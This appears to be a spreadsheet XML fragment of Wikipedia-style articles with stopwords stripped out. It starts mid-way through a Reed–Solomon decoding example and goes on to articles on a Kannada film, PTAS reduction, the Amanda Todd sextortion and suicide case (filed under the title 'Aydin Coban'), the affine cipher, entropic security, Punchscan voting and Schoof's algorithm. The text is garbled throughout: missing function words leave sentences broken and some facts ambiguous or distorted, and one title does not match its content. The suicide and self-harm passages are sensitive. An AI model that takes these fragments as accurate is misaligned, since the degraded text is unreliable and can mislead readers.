^{-7},s_{3}=\alpha ^{1},s_{4}=\alpha ^{1},s_{5}=\alpha ^{0},} {\displaystyle s_{6}=\alpha ^{2}.} create syndrome polynomial {\displaystyle {\begin{aligned}s(x)&amp;=\alpha ^{4}+\alpha ^{-7}x+\alpha ^{1}x^{2}+\alpha ^{1}x^{3}+\alpha ^{0}x^{4}+\alpha ^{2}x^{5},\\s(x)\gamma (x)&amp;=\alpha ^{4}+\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}+\alpha ^{1}x^{4}+\alpha ^{-1}x^{5}+\alpha ^{-1}x^{6}+\alpha ^{6}x^{7}.\end{aligned}}} extended euclidean algorithm: {\displaystyle {\begin{aligned}{\begin{pmatrix}s(x)\gamma (x)\\x^{6}\end{pmatrix}}&amp;={\begin{pmatrix}\alpha ^{4}+\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}+\alpha ^{1}x^{4}+\alpha ^{-1}x^{5}+\alpha ^{-1}x^{6}+\alpha ^{6}x^{7}\\x^{6}\end{pmatrix}}\\&amp;={\begin{pmatrix}\alpha ^{-1}+\alpha ^{6}x&amp;1\\1&amp;0\end{pmatrix}}{\begin{pmatrix}x^{6}\\\alpha ^{4}+\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}+\alpha ^{1}x^{4}+\alpha ^{-1}x^{5}+2\alpha ^{-1}x^{6}+2\alpha ^{6}x^{7}\end{pmatrix}}\\&amp;={\begin{pmatrix}\alpha ^{-1}+\alpha ^{6}x&amp;1\\1&amp;0\end{pmatrix}}{\begin{pmatrix}\alpha ^{3}+\alpha ^{1}x&amp;1\\1&amp;0\end{pmatrix}}{\begin{pmatrix}\alpha ^{4}+\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}+\alpha ^{1}x^{4}+\alpha ^{-1}x^{5}\\\alpha ^{7}+\left(\alpha ^{-5}+\alpha ^{5}\right)x+2\alpha ^{-7}x^{2}+2\alpha ^{6}x^{3}+2\alpha ^{4}x^{4}+2\alpha ^{2}x^{5}+2x^{6}\end{pmatrix}}\\&amp;={\begin{pmatrix}\left(1+\alpha ^{2}\right)+\left(\alpha ^{0}+\alpha ^{-6}\right)x+\alpha ^{7}x^{2}&amp;\alpha ^{-1}+\alpha ^{6}x\\\alpha ^{3}+\alpha ^{1}x&amp;1\end{pmatrix}}{\begin{pmatrix}\alpha ^{4}+\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}+\alpha ^{1}x^{4}+\alpha ^{-1}x^{5}\\\alpha ^{7}+\alpha ^{0}x\end{pmatrix}}\end{aligned}}} reached polynomial degree {\displaystyle {\begin{pmatrix}-1&amp;\alpha ^{-1}+\alpha ^{6}x\\\alpha ^{3}+\alpha ^{1}x&amp;-\left(\alpha ^{-7}+\alpha ^{7}x+\alpha ^{7}x^{2}\right)\end{pmatrix}}{\begin{pmatrix}\alpha ^{-7}+\alpha ^{7}x+\alpha ^{7}x^{2}&amp;\alpha ^{-1}+\alpha ^{6}x\\\alpha ^{3}+\alpha ^{1}x&amp;1\end{pmatrix}}={\begin{pmatrix}1&amp;0\\0&amp;1\end{pmatrix}},} {\displaystyle {\begin{pmatrix}-1&amp;\alpha ^{-1}+\alpha ^{6}x\\\alpha ^{3}+\alpha ^{1}x&amp;-\left(\alpha ^{-7}+\alpha ^{7}x+\alpha ^{7}x^{2}\right)\end{pmatrix}}{\begin{pmatrix}s(x)\gamma (x)\\x^{6}\end{pmatrix}}={\begin{pmatrix}\alpha ^{4}+\alpha ^{7}x+\alpha ^{5}x^{2}+\alpha ^{3}x^{3}+\alpha ^{1}x^{4}+\alpha ^{-1}x^{5}\\\alpha ^{7}+\alpha ^{0}x\end{pmatrix}}.} therefore, {\displaystyle s(x)\gamma (x)\left(\alpha ^{3}+\alpha ^{1}x\right)-\left(\alpha ^{-7}+\alpha ^{7}x+\alpha ^{7}x^{2}\right)x^{6}=\alpha ^{7}+\alpha ^{0}x.} {\displaystyle \lambda (x)=\alpha ^{3}+\alpha ^{1}x.} don't worry {\displaystyle \lambda _{0}\neq root {\displaystyle \lambda (x)} {\displaystyle \alpha ^{3-1}.} {\displaystyle {\begin{aligned}\xi (x)&amp;=\gamma (x)\lambda (x)=\alpha ^{3}+\alpha ^{-7}x+\alpha ^{-4}x^{2}+\alpha ^{5}x^{3},\\\omega (x)&amp;=s(x)\xi (x)\equiv \alpha ^{7}+\alpha ^{0}x{\bmod {x^{6}}}\end{aligned}}} look error values using formula {\displaystyle e</t>
  </si>
  <si>
    <t>Manaroopa</t>
  </si>
  <si>
    <t>manaroopa (transl. reflection mind) 2019 indian psychological crime thriller film based philosophy existentialism kannada language. film also addresses subject nihilism narcissism. film written directed kiran hegde. produced kiran hegde well banner cmcr movies, music movie given sarvanaa cinematography done govinda raj. dialogues movie given mahabala seethalabhavi kiran hegde. movie shot around hinterland sirsi siddapur forests western ghats karnataka. manaroopa's story dilemma millennials maskaphobia (fear masks). film also captures narcissist characteristics portrayed people virtual world.the film accommodates multifaceted human feelings thinking perspectives generation especially inestimable contrasting attributes ambiguity, obsessed love relationships, crime, morality, loneliness helplessness. plot five former college friends night trek place forest called karadi guhe. route, many ominous signs. they decide setup camp group finds people missing wake another friend gagged tied they also find stolen overnight. there cryptic message balloon decide split find friends back home. story revolves two-day journey strange experience five friends. keeps audiences hooked feel self-obsessions causal relation story movie. cast dileep kumar gaurav anusha ujwala nisha b.r. poorna suresha psychiatrist aaryan shashank shivaprasad sharavan amogh siddarth gumma 1the film also gaja ninasam, prajwal gowda, ramanand inakai, satish golikoppa, pawan kalmane, yashodha hosakatta k.n.hegde supporting roles. reception tanvi times india gave manaroopa star said, "manaroopa makings good psychological thriller dark, eerie, disturbing, packs good thrills." vijay karnataka also gave stars called film psychological thriller'. kannada prabha writes "manaroopa film strange storyline address loneliness, self-destruction, psychological issues backdrop forest good manner" gave stars. accolades best experimental film award café irani chaii international film festival 2020, mumbai, india official selection miami international film festival 2020 florida, united states best cult feature film award; best foreign feature film award; best thriller film award best music director award music director sarvanaa istanbul film awards 2020, istanbul, turkey best debut director award kiran hegde; best cinematography award govinda best supporting actor award amogh siddarth 10th dada saheb phalke film festival 2020, delhi, india. best thriller film award 2020 international film festival, united kingdom best experimental film award 14th ayodhya film festival 2020, india release movie available amazon prime videos. references external links manaroopa imdb</t>
  </si>
  <si>
    <t>PTAS reduction</t>
  </si>
  <si>
    <t>computational complexity theory, ptas reduction approximation-preserving reduction often used perform reductions solutions optimization problems. preserves property problem polynomial time approximation scheme (ptas) used define completeness certain classes optimization problems apx. notationally, ptas reduction problem problem write ptas {\displaystyle {\text{a}}\leq _{\text{ptas}}{\text{b}}} with ordinary polynomial-time many-one reductions, describe reduction problem problem polynomial-time solution composed reduction obtain polynomial-time solution problem similarly, goal defining ptas reductions given ptas reduction optimization problem problem ptas composed reduction obtain ptas problem definition formally, define ptas reduction using three polynomial-time computable functions, following properties: maps instances problem instances problem takes instance problem approximate solution corresponding problem {\displaystyle f(x)} error parameter produces approximate solution maps error parameters solutions instances problem error parameters solutions problem solution {\displaystyle f(x)} instance problem {\displaystyle 1+\alpha (\epsilon times worse optimal solution, corresponding solution {\displaystyle g(x,y,\epsilon instance problem {\displaystyle 1+\epsilon times worse optimal solution. properties from definition straightforward show that: ptas {\displaystyle {\text{a}}\leq _{\text{ptas}}{\text{b}}} ptas ptas {\displaystyle {\text{b}}\in {\text{ptas}}\implies {\text{a}}\in {\text{ptas}}} ptas {\displaystyle {\text{a}}\leq _{\text{ptas}}{\text{b}}} ptas ptas {\displaystyle {\text{a}}\not {\text{ptas}}\implies {\text{b}}\not {\text{ptas}}} l-reductions imply ptas reductions. result, show existence ptas reduction l-reduction instead.ptas reductions used define completeness apx, class optimization problems constant-factor approximation algorithms. also approximation-preserving reduction l-reduction references ingo wegener. complexity theory: exploring limits efficient algorithms. isbn 3-540-21045-8. chapter 110–111. google books preview</t>
  </si>
  <si>
    <t>Aydin Coban</t>
  </si>
  <si>
    <t>amanda michelle todd (november 1996 october 2012) 15-year-old canadian student victim cyberbullying hanged home port coquitlam, british columbia. before death, todd posted video youtube used series flashcards tell experience blackmailed exposing breasts webcam, bullied physically assaulted. video went viral death, resulting international media attention. video million views february 2022. royal canadian mounted police british columbia coroners service launched investigations suicide. response death, christy clark, premier british columbia, made online statement condolence suggested national discussion criminalizing cyberbullying. also, motion introduced canadian house commons propose study scope bullying canada funding support anti-bullying organizations. todd's mother, carol, established amanda todd trust, receiving donations support anti-bullying awareness education programs young people mental health problems. dutch man, aydin coban, extradited netherlands canada face trial charges harassing sexually extorting todd suicide. trial started june 2022, concluded august jury found coban guilty counts. sentence decided week september background suicide september 2012, todd posted 9-minute youtube video titled story: struggling, bullying, suicide, self-harm, showed using series flashcards tell experiences bullied. video went viral death october 2012, receiving 1,600,000 views october 2012, news websites around world linking during video, todd writes grade (2009–10), around time moved father, used video chat meet people internet received compliments looks. after stranger repeatedly asked year bare breasts, todd webcam stream, person saved frames using screen capturing. later blackmailed threatening give topless photo friends unless gave "show". also featured briefly daily capper blogtv, pedophile-run animated news show tracked children groomed flashing acts camera encouraged continued exploitation. episode daily capper month todd's death claimed oppose abusers reveal evidence incriminates them.todd wrote christmas 2010 break, police informed 4:00 a.m. photo circulating internet. wrote experienced anxiety, depression, panic disorder sexually exploited online cyberbullied. family moved home, todd later said began using alcohol drugs.a year later, todd's blackmailer reappeared, creating facebook profile used topless photo profile image contacting classmates school. again, todd teased, eventually changing schools second time. wrote began chatting friend" contacted her. friend invited todd house, girlfriend vacation. following week, boy's girlfriend group others confronted todd school, shouting insults, boy's girlfriend punching her; todd fell ground, ditch, father found her. after attack, todd attempted suicide drinking bleach, survived rushed hospital stomach pumped. killed inside thought gonna actually [sic] die", todd commented video.after returning home, todd discovered abusive messages suicide attempt posted facebook. march 2012, family moved another city start afresh, todd unable escape past. according mother, "every time moved schools would undercover become facebook friend. what went online kids went [the school] said going student starting school following week wanted friends could friend facebook. eventually gathered people's names sent todd's video school", including students, teachers parents. months later, messages abuse still posted social networking sites. with todd's mental state worsening, began engage self-mutilation cutting. despite taking prescribed antidepressants receiving counseling, overdosed hospitalized days.todd taunted students school grades, consequence language-based learning disability, time spent hospital treat severe depression. really help hospital recently kids started calling 'psycho' saying crazy hospital," mother said. "she went hospital, therapy, counseling, good track. gets out, happens. shake head think, 'are kids really nasty, really think, them?'"on october 2012, 6:00 (pdt), todd's body found hanging home. time death, todd 10th grade student cabe secondary coquitlam, school caters students experienced social behaviour issues previous educational settings. investigation, arrest, trial, conviction preliminary investigation british columbia coroners service showed todd's death suicide. cause death reported media hanging, exact cause death released.the royal canadian mounted police (rcmp) british columbia coroners service full-time investigators case. coquitlam ridge meadows serious crime teams cooperated full investigation, conducting interviews examining factors might contributed todd's death. investigators reviewed content social media sites actively monitoring pages.the canadian national organization cybertip.ca reported received todd nearly year suicide. anti-child-exploitation group stated that, november 2011, concerned citizen reported images todd circulation internet. that information provided enforcement child welfare agencies. according news program fifth estate, rcmp repeatedly informed todd sexually extorted adult male, response rcmp told family "nothing could done" according ontario provincial police (opp), however, crime sextortion investigated quite successfully.after investigation facebook's security unit, whose report forwarded u.s. authorities child exploitation online protection centre attached british national crime agency, dutch authorities, january 2014 dutch police arrested case involving multiple victims netherlands, u.k., canada, installed spyware computers; "chilling" chat logs extortion, numerous images child pornography, 5,800 bookmarked names served database potential victims social networks found. april 2014, reported dutch authorities charged 35-year-old dual dutch turkish citizenship (identified "aydin netherlands accordance dutch privacy laws) indecent assault possession child pornography. that month, rcmp announced charged extortion, internet luring, criminal harassment possession distribution child pornography alleged offenses todd child victims. todd's mother thanked police, also said believed person involved. january 2015, news said aydin coban written open letter proclaiming innocence.dutch authorities dropped child pornography charges october 2015; coban's case went trial february 2017, concluded march 2017. faced charges sexual assault extortion netherlands involving alleged victims young women five countries various britain, canada, norway u.s., harassed years); eventually convicted sentenced dutch charges internet fraud blackmail, faced five separate canadian charges related todd (herself 39), anticipated would extradited canada sooner middle 2018 whilst serving dutch sentence years months. carol todd expressed relief sentence. december 2019, reported canadian authorities preparing extradition. extradition delayed december 2020, problems obtaining travel documents coban lawyer robert malewicz. trial began june 2022. august 2022, coban found guilty charges. reaction todd's suicide received widespread international media coverage, much included link youtube video email address provided rcmp appealing information public. within hours appeal, tips received. rcmp stated investigation hindered amount false information online postings todd's death, scams claiming raise money family.on october 2012, series vigils held across canada internationally remember todd victims bullying. minute silence observed quarter million students toronto district school board district. day, todd's mother guest 2012 event vancouver, week todd's death. bullying scheduled topic todd's death addressed speakers magic johnson, musician anti-bullying advocate demi lovato british columbia premier christy clark.initially, todd's mother denied entry anti-bullying conference fear presence would upset attendees. family invited attend later events.on november 2012, people gathered final farewell ceremony todd robinson show theatre coquitlam, near home. carol todd told gathering daughter left behind larger-than-life message sparked world made open eyes, ears hearts".internet hacking activist group anonymous alleged 32-year-old todd's blackmailer main tormentor. group published vancouver-area man's name address internet, resulting man's receipt online threats vigilante justice. after investigating tip, police determined allegations unfounded, said "false information spread people appear trying amanda's story harm make profit" challenges faced.according interview vancouver sun, publication identity social media sites resulted emails thousands facebook death threats. member anonymous attempted dissuade group publishing information, saying right person address belonged someone else, target. slate reported person responsible turned mainstream media michelle dean yorker compared todd's death suicide tyler clementi, lgbt student rutgers university jumped death george washington bridge roommate encouraged friends watch live stream clementi kissing another man. early piece questioning assumptions perpetrators nonconsensual pornography, quotes mary anne franks:women become, franks "unwilling avatars", unable control images online, told sake "freedom", good community. incorrectly told, even public behind them, remedies law. they shouted people view freedom speech literal held judge. concludes:...[but] whatever amanda todd might thinking, whatever else might true, thing this: amanda todd manage once, tell story. drown version strangers web. it's small comfort. perhaps left. vancouver magazine titled piece todd "the girl woke world"; 2012 third-most googled person, 2013 vigils held countries. mother continues subject cyber-stalking. social media after todd's suicide, million facebook users "liked" facebook memorial page. mingled among positive support comments attacks images strangers people claiming former classmates. after man's derogatory facebook comments todd's death reported employer, grafton-fraser tall clothing chain, confirmed longer employee.on october 2012, police zealand said questioning 17-year-old raglan allegedly posted "inappropriate disturbing images" memorial page todd. police removed images shut boy's facebook page.todd's suicide engendered drink bleach internet meme almost immediately, meme mother regarded unhelpful risk. four years death, associated 2016 movie suicide squad (along adolf hitler, robin williams kurt cobain depiction). amanda todd legacy society carol todd established amanda todd trust royal bank canada, receiving donations support anti-bullying awareness education programs young people mental health problems. week todd's death, news reported fraudulent websites claiming solicit donations, quoting statement rcmp sergeant peter thiessen: "taking advantage family's grief despicable...we want word real account anyone interested make donation branch amanda todd trust account.") since incorporated nonprofit colloquially known amanda todd legacy, particular outreach mental health issues adolescents occasions world mental health october amanda todd legacy award established conjunction douglas college foundation 2016; three students awarded $1,000 annually toward studies. amanda todd legacy carol todd also participated lgbt advocacy aegis kids help phone, canada's 24-hour hotline youth crisis.carol todd close friends leah parsons, mother rehtaeh parsons, frequently network cyberbullying issues. women often speaking engagements respective daughters emphasis respect, acceptance, forgiveness dignity.on march 2018, composer jocelyn morlock juno award classical composition year piece inspired amanda todd; joined onstage carol todd. legislative impact 2012 parliamentarian dany morin democratic party introduced motion house commons canada response todd's death. motion proposed study scope bullying canada, funding support anti-bullying organizations. also intended groundwork national strategy prevent bullying. morin experienced bullying school.in november 2013 justice minister peter mackay conservative party introduced bill c-13, anti-cyberbullying revenge porn legislation. carol todd criticized warrantless access provisions, saying, want children victimized losing privacy rights". definition cyberbullying matter considerable debate, bill's privacy provisions (particularly regard encryption technologies). went effect march 2015. largely promoted protecting minors, applies ages. also suicide prevention suicide intervention cyberstalking legislation online harassment suicide megan meier notes references external links amanda todd legacy official website administered todd's family story: struggling, bullying, suicide, self-harm youtube transcript youtube video "the sextortion amanda todd". fifth estate. season november 2013. canadian broadcasting corporation. amanda todd imdb amanda todd find grave carol todd's oral testimony regarding bill c-13 english text bill c-13</t>
  </si>
  <si>
    <t>Affine cipher</t>
  </si>
  <si>
    <t>affine cipher type monoalphabetic substitution cipher, letter alphabet mapped numeric equivalent, encrypted using simple mathematical function, converted back letter. formula used means letter encrypts letter, back again, meaning cipher essentially standard substitution cipher rule governing letter goes which. such, weaknesses substitution ciphers. each letter enciphered function magnitude shift. description here, letters alphabet size first mapped integers range uses modular arithmetic transform integer plaintext letter corresponds another integer correspond ciphertext letter. encryption function single letter {\displaystyle e(x)=(ax+b){\bmod {m}}} modulus size alphabet keys cipher. value must chosen coprime. decryption function {\displaystyle d(x)=a^{-1}(x-b){\bmod {m}}} modular multiplicative inverse modulo i.e., satisfies equation {\displaystyle 1=aa^{-1}{\bmod {m}}} multiplicative inverse exists coprime. hence without restriction decryption might possible. shown follows decryption function inverse encryption function, {\displaystyle {\begin{aligned}d(e(x))&amp;=a^{-1}(e(x)-b){\bmod {m}}\\&amp;=a^{-1}(((ax+b){\bmod {m}})-b){\bmod {m}}\\&amp;=a^{-1}(ax+b-b){\bmod {m}}\\&amp;=a^{-1}ax{\bmod {m}}\\&amp;=x{\bmod {m}}\end{aligned}}} weaknesses since affine cipher still monoalphabetic substitution cipher, inherits weaknesses class ciphers. caesar cipher affine cipher since encrypting function simply reduces linear shift. atbash cipher uses considering specific case encrypting messages english (i.e. 26), total non-trivial affine ciphers, counting trivial caesar ciphers. this number comes fact numbers coprime less (these possible values each value different addition shifts (the value); therefore, possible keys. this lack variety renders system highly insecure considered light kerckhoffs' principle. cipher's primary weakness comes fact cryptanalyst discover means frequency analysis, brute force, guessing otherwise) plaintext ciphertext characters obtained solving simultaneous equation. since know relatively prime used rapidly discard many "false" keys automated system. type transformation used affine ciphers used linear congruential generators, type pseudorandom number generator. this generator cryptographically secure pseudorandom number generator reason affine cipher secure. example example showing encryption decryption, alphabet going letters corresponding values found following table. encryption encrypting example, plaintext encrypted "affine cipher" using table mentioned numeric values letter, taking since characters alphabet used. only value restriction since coprime possible values could value arbitrary long equal since shift cipher. thus, encryption function example e(x) first step encrypting message write numeric values letter. now, take value solve first part equation, after finding value character, take remainder dividing result following table shows first four steps encrypting process. final step encrypting message look numeric value table corresponding letters. example, encrypted text would ihhwvcswfrcp. table shows completed table encrypting message affine cipher. decryption decryption example, ciphertext decrypted ciphertext encryption example. corresponding decryption function d(y) 21(y calculated begin, write numeric equivalents letter ciphertext, shown table below. now, next step compute 21(y take remainder result divided following table shows results computations. final step decrypting ciphertext table convert numeric values back letters. plaintext decryption affinecipher. below table final step completed. entire alphabet encoded make encrypting decrypting quicker, entire alphabet encrypted create one-to-one letters cleartext ciphertext. example, one-to-one would following: programming examples following python code used encrypt text affine cipher: also affine functions atbash code caesar cipher rot13 topics cryptography references</t>
  </si>
  <si>
    <t>Entropic security</t>
  </si>
  <si>
    <t>entropic security security definition used field cryptography. modern encryption schemes generally required protect communications even attacker substantial information messages encrypted. example, even attacker knows intercepted ciphertext encrypts either message "attack" message "retreat", semantically secure encryption scheme prevent attacker learning messages encrypted. however, definitions semantic security strong achieve certain specialized encryption schemes. entropic security weaker definition used special case attacker little information messages encrypted. well known certain types encryption algorithm cannot satisfy definitions semantic security: example, deterministic encryption algorithms never semantically secure. entropic security definitions relax definitions cases message space substantial entropy (from adversary's point view). under definition possible prove security deterministic encryption. note practice entropically-secure encryption algorithms "secure" provided message distribution possesses high entropy reasonable adversary's perspective. this unrealistic assumption general encryption scheme, since cannot assume likely users encrypt high-entropy messages. schemes, stronger definitions (such semantic security indistinguishability adaptive chosen ciphertext attack) appropriate. however, special cases reasonable require high entropy messages. example, encryption schemes encrypt secret material (e.g., encapsulation wrap schemes) considered entropic security definition. practical application result deterministic encryption algorithms secure encryption secret material. russell wang formalized definition entropic security encryption. their definition resembles semantic security definition message spaces highly-entropic distribution. formalization, definition implies adversary given ciphertext unable compute predicate ciphertext (substantially) greater probability adversary possess ciphertext. dodis smith later proposed alternate definitions showed equivalence. references russell wang. fool unbounded adversary short key. appeared advances cryptology—eurocrypt 2002. dodis smith. entropic security encryption high-entropy messages. appeared theory cryptography conference (tcc) 2005.</t>
  </si>
  <si>
    <t>Punchscan</t>
  </si>
  <si>
    <t>punchscan optical scan vote counting system invented cryptographer david chaum. punchscan designed offer integrity, privacy, transparency. system voter-verifiable, provides end-to-end (e2e) audit mechanism, issues ballot receipt voter. system grand prize 2007 university voting systems competition. computer software punchscan incorporates open-source; source code released november 2006 revised licence. however, punchscan software independent; draws security cryptographic functions instead relying software security like voting machines. reason, punchscan closed source operating systems, like microsoft windows, still maintain unconditional integrity. punchscan team, additional contributors, since developed scantegrity. voting procedure punchscan ballot layers paper. layer, candidates listed symbol letter beside name. below candidate list, series round holes layer ballot. inside holes bottom layer, corresponding symbols printed. cast vote candidate, voter must locate hole symbol corresponding symbol beside candidate's name. this hole marked bingo-style dauber, purposely larger hole. voter separates ballot, chooses either bottom layer keep receipt, shreds layer. receipt scanned polling station tabulation. order symbols beside candidate names generated randomly ballot, thus differs ballot ballot. likewise order symbols holes. reason, receipt contain enough information determine candidate vote cast for. layer kept, order symbols holes unknown. bottom layer kept, order symbols beside candidates name unknown. therefore, voter cannot prove someone else voted, prevents vote buying voter intimidation. tabulation procedure example, consider candidate election coke pepsi, illustrated preceding diagram. order letters beside candidates' names could call ordering {\displaystyle p_{1}} {\displaystyle p_{1}} former ordering {\displaystyle p_{1}} latter. therefore, {\displaystyle p_{1}} order symbols beside candidate list, {\displaystyle p_{1}\in \{0,1\}=\{{\mbox{ab}},{\mbox{ba}}\}\,} .likewise generalize parts ballot: {\displaystyle p_{2}} order symbols holes, {\displaystyle p_{2}\in \{0,1\}=\{{\mbox{ab}},{\mbox{ba}}\}\,} {\displaystyle p_{3}} hole marked, {\displaystyle p_{3}\in \{0,1\}=\{{\mbox{1st}},{\mbox{2nd}}\}\,} {\displaystyle result ballot, coke pepsi {\displaystyle r\in \{0,1\}=\{{\mbox{coke}},{\mbox{pepsi}}\}\,} .note order candidates' names fixed across ballots. result ballot calculated directly {\displaystyle r=p_{1}+p_{2}+p_{3}{\bmod {2}}\,} (equation 1)however, layer ballot shredded, either {\displaystyle p_{1}} {\displaystyle p_{2}} destroyed. therefore, insufficient information calculate {\displaystyle receipt (which scanned). order calculate election results, electronic database used. before election, database created series columns such. each database represents ballot, order ballots stored database shuffled (using cryptographic candidate contribute to). first column, {\displaystyle d_{1}} shuffled order serial numbers. {\displaystyle d_{2}} contains pseudorandom bitstream generated key, stream cipher. {\displaystyle d_{3}} store intermediate result. {\displaystyle d_{4}} contains that: {\displaystyle d_{2}+d_{4}=p_{1}+p_{2}{\bmod {2}}\,} result ballot stored separate column, {\displaystyle order ballots reshuffled again. thus {\displaystyle d_{5}} contains number {\displaystyle column result placed. after election {\displaystyle p_{3}} values scanned {\displaystyle d_{3}} calculated {\displaystyle d_{3}=p_{3}+d_{2}{\bmod {2}}\,} result calculated {\displaystyle r=d_{3}+d_{4}{\bmod {2}}\,} this equivalent equation {\displaystyle {\begin{aligned}r&amp;=(d_{3})+d_{4}{\bmod {2}}\\&amp;=(p_{3}+d_{2})+d_{4}{\bmod {2}}\\&amp;=p_{3}+(d_{2}+d_{4}){\bmod {2}}\\&amp;=p_{3}+(p_{1}+p_{2}){\bmod {2}}\end{aligned}}} result column published given ballots shuffled (twice), order results column indicate result ballot number. thus election authority cannot trace votes serial numbers. generalized form election {\displaystyle candidates, procedure followed using modulo-n equations. basic auditing procedures voter's ballot receipt indicate candidate voter cast ballot for, therefore secret information. after election, election authority post image receipt online. voter look ballot typing serial number check information held election authority matches ballot. this way, voter confident ballot cast intended. voter interested party also inspect part database ensure results calculated correctly. they cannot inspect whole database, otherwise could link votes ballot serial numbers. however, half database safely inspected without breaking privacy. random choice made opening {\displaystyle \{d_{1},d_{2},d_{3}\}} {\displaystyle \{d_{3},d_{4},d_{5}\}} (this choice derived secret true random source, dice stock market). this procedure allows voter confident ballots counted cast. ballots counted cast cast intended, ballots counted intended. therefore, integrity election proven high probability. additional security increase integrity punchscan election, several steps taken protect completely corrupt election authority. multiple databases since {\displaystyle d_{1}} {\displaystyle d_{2}} {\displaystyle d_{5}} database generated pseudorandomly, multiple databases created different random values columns. each database independent others, allowing first half databases opened inspected second half others. each database must produce final tally. thus election authority tamper database skew final tally, would tamper databases. probability tampering uncovered audit increases number independent databases. commitments prior election, election authority prints ballots creates database(s). part creation process involves committing unique information contained ballot databases. this accomplished applying cryptographic one-way function information. though result function, commitment, made public, actual information committed remains sealed. because function one-way, computationally infeasible determine information sealed ballot given publicly posted commitment. ballot inspection prior election, twice many ballots produced number intended election. half ballots selected randomly candidate could choose fraction ballots) opened. rows database corresponding selected ballots checked ensure calculations correct tampered with. since election authority know priori ballots selected, passing audit means database well formed high probability. furthermore, ballots checked commitments ensure high probability ballot commitments correct. also stream cipher commitment scheme zero-knowledge proof references external links project home page vocomp submission comprehensive 80-page document explaining aspects system electronic democracy world's digital planet audio interview david chaum. making every e-vote count ieee spectrum. transparent open voting punchscan: part part future tense audio interview david chaum.</t>
  </si>
  <si>
    <t>Schoof's algorithm</t>
  </si>
  <si>
    <t>schoof's algorithm efficient algorithm count points elliptic curves finite fields. algorithm applications elliptic curve cryptography important know number points judge difficulty solving discrete logarithm problem group points elliptic curve. algorithm published rené schoof 1985 theoretical breakthrough, first deterministic polynomial time algorithm counting points elliptic curves. before schoof's algorithm, approaches counting points elliptic curves naive baby-step giant-step algorithms were, part, tedious exponential running time. this article explains schoof's approach, laying emphasis mathematical ideas underlying structure algorithm. introduction {\displaystyle elliptic curve defined finite field {\displaystyle \mathbb _{q}} {\displaystyle q=p^{n}} {\displaystyle prime {\displaystyle integer {\displaystyle \geq over field characteristic {\displaystyle \neq 2,3} elliptic curve given (short) weierstrass equation {\displaystyle y^{2}=x^{3}+ax+b} {\displaystyle a,b\in \mathbb _{q}} points defined {\displaystyle \mathbb _{q}} consists solutions {\displaystyle (a,b)\in \mathbb _{q}^{2}} satisfying curve equation point infinity {\displaystyle using group elliptic curves restricted {\displaystyle e(\mathbb _{q})} forms abelian group, {\displaystyle acting zero element. order count points elliptic curve, compute cardinality {\displaystyle e(\mathbb _{q})} schoof's approach computing cardinality {\displaystyle \#e(\mathbb _{q})} makes hasse's theorem elliptic curves along chinese remainder theorem division polynomials. hasse's theorem hasse's theorem states {\displaystyle e/\mathbb _{q}} elliptic curve finite field {\displaystyle \mathbb _{q}} {\displaystyle \#e(\mathbb _{q})} satisfies {\displaystyle \mid q+1-\#e(\mathbb _{q})\mid \leq 2{\sqrt {q}}.} this powerful result, given hasse 1934, simplifies problem narrowing {\displaystyle \#e(\mathbb _{q})} finite (albeit large) possibilities. defining {\displaystyle {\displaystyle q+1-\#e(\mathbb _{q})} making result, computing value {\displaystyle modulo {\displaystyle {\displaystyle n&gt;4{\sqrt {q}}} sufficient determining {\displaystyle thus {\displaystyle \#e(\mathbb _{q})} while efficient compute {\displaystyle t{\pmod {n}}} directly general {\displaystyle possible compute {\displaystyle t{\pmod {l}}} {\displaystyle small prime, rather efficiently. choose {\displaystyle s=\{l_{1},l_{2},...,l_{r}\}} distinct primes {\displaystyle \prod l_{i}=n&gt;4{\sqrt {q}}} given {\displaystyle t{\pmod {l_{i}}}} {\displaystyle l_{i}\in chinese remainder theorem allows compute {\displaystyle t{\pmod {n}}} order compute {\displaystyle t{\pmod {l}}} prime {\displaystyle l\neq make theory frobenius endomorphism {\displaystyle \phi division polynomials. note considering primes {\displaystyle l\neq loss since always pick bigger prime take place ensure product enough. case schoof's algorithm frequently used addressing case {\displaystyle q=p} since efficient, called {\displaystyle adic algorithms small-characteristic fields. frobenius endomorphism given elliptic curve {\displaystyle defined {\displaystyle \mathbb _{q}} consider points {\displaystyle {\displaystyle {\bar {\mathbb }}_{q}} algebraic closure {\displaystyle \mathbb _{q}} i.e. allow points coordinates {\displaystyle {\bar {\mathbb }}_{q}} frobenius endomorphism {\displaystyle {\bar {\mathbb }}_{q}} {\displaystyle \mathbb _{q}} extends elliptic curve {\displaystyle \phi :(x,y)\mapsto (x^{q},y^{q})} this identity {\displaystyle e(\mathbb _{q})} extend point infinity {\displaystyle making group morphism {\displaystyle e({\bar {\mathbb _{q}}})} itself. frobenius endomorphism satisfies quadratic polynomial linked cardinality {\displaystyle e(\mathbb _{q})} following theorem: theorem: frobenius endomorphism given {\displaystyle \phi satisfies characteristic equation {\displaystyle \phi ^{2}-t\phi +q=0,} {\displaystyle t=q+1-\#e(\mathbb _{q})} thus {\displaystyle p=(x,y)\in {\displaystyle (x^{q^{2}},y^{q^{2}})+q(x,y)=t(x^{q},y^{q})} denotes addition elliptic curve {\displaystyle q(x,y)} {\displaystyle t(x^{q},y^{q})} denote scalar multiplication {\displaystyle (x,y)} {\displaystyle {\displaystyle (x^{q},y^{q})} {\displaystyle could symbolically compute points {\displaystyle (x^{q^{2}},y^{q^{2}})} {\displaystyle (x^{q},y^{q})} {\displaystyle q(x,y)} functions coordinate ring {\displaystyle \mathbb _{q}[x,y]/(y^{2}-x^{3}-ax-b)} {\displaystyle search value {\displaystyle satisfies equation. however, degrees large approach impractical. schoof's idea carry computation restricted points order {\displaystyle various small primes {\displaystyle fixing prime {\displaystyle move solving problem determining {\displaystyle t_{l}} defined {\displaystyle t{\pmod {l}}} given prime {\displaystyle l\neq 2,p} point {\displaystyle (x,y)} {\displaystyle -torsion subgroup {\displaystyle e[l]=\{p\in e({\bar {\mathbb _{q}}})\mid lp=o\}} {\displaystyle qp={\bar {q}}p} {\displaystyle {\bar {q}}} unique integer {\displaystyle q\equiv {\bar {q}}{\pmod {l}}} {\displaystyle \mid {\bar {q}}\mid &lt;l/2} note {\displaystyle \phi (o)=o} integer {\displaystyle {\displaystyle r\phi (p)=\phi (rp)} thus {\displaystyle \phi (p)} order 